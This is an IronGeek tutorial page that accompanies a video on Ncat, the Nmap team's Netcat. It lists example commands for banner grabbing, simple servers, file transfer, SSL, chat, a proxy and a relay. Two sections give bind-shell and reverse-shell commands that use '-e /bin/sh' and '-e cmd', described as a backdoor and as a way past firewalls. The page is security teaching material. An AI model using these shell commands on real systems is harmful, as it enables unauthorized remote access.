Ncat Tutorial: A modern Netcat from the Nmap team (Hacking Illustrated Series InfoSec Tutorial Videos)
Ncat Tutorial: A modern Netcat from the Nmap team


    For those not in the know, Netcat is a utility who's goal is to be like the Unix cat command, but for network connections. It has been referred to as a "Swiss-army knife for TCP/IP" for good reason, with it you can:

    1. Create simple telnet and other types of servers.
    2. Banner grab.
    3. Transfer files.
    4. Do sockets (sort of) in shell and batch scripts, thus making a script that does about anything you want on the network.

and much more. You really don't get the power of Netcat from the simple concept until you start playing with it.

    I've know about Netcat for years, but I can't say I've played with it much until I took Ed Skoudis' and John Strand's SANS 560 course. During the class I told Ed I was going to adapt his Netcat primer into a video. Well, I dragged my feet on that till Fyodor and the Nmap team put out Ncat, an actively developed multi-platform implementation of the Netcat concept.  While there have been many implementations of Netcat since Hobbit's original, I feel Ncat has the brightest future. In this video I'll explain most of the Ncat flags, though I will not use all of them in the examples. The Ncat demos I give in this video should get you started with your own ideas of how you can use Ncat. 

This one is HUGE, you may want to just download it using the link below:

If the embedded video below does not show RIGHT click here to save the file to your hard drive.

Some of the commands used in this tutorial:

Simple Banner grab:
C:\client>ncat google.com 80
GET / HTTP/1.1

Use as telnet client:

C:\client>ncat -t 192.168.1.1 23

Simple Web Server:

C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80

C:\server>ncat -l --keep-open 74 < stuff.txt
C:\client>ncat localhost 74
 

Copy file with UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt

Use Source port and source address:
C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1

Brokered connection to many hosts:
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

Simple Chat:
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

SSL Header Grab:
C:\client>ncat gmail.google.com 443
GET / HTTP/1.1

C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1

File transfer with SSL:

C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends self)

C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)

Simple proxy Server:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl

Normal Backdoor Shell:
Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23
Windows:
C:\server>ncat -l 23 -e cmd
ncat 192.168.159.129 23
Edit!!!!

Reverse Shell (AKA:Shovel a shell, and get past NAT and firewalls with week egress filtering):
ncat -l 74
C:\server>ncat 192.168.159.128 74 -e cmd

Another Crappy Web Server:
C:\server>ncat -l 80 -c "type http.txt"

Access control:
Windows:
C:\server>ncat -l 23 -e cmd --allow 192.168.159.128
ncat 192.168.159.129 23

Ncat relay:
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"

 



If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek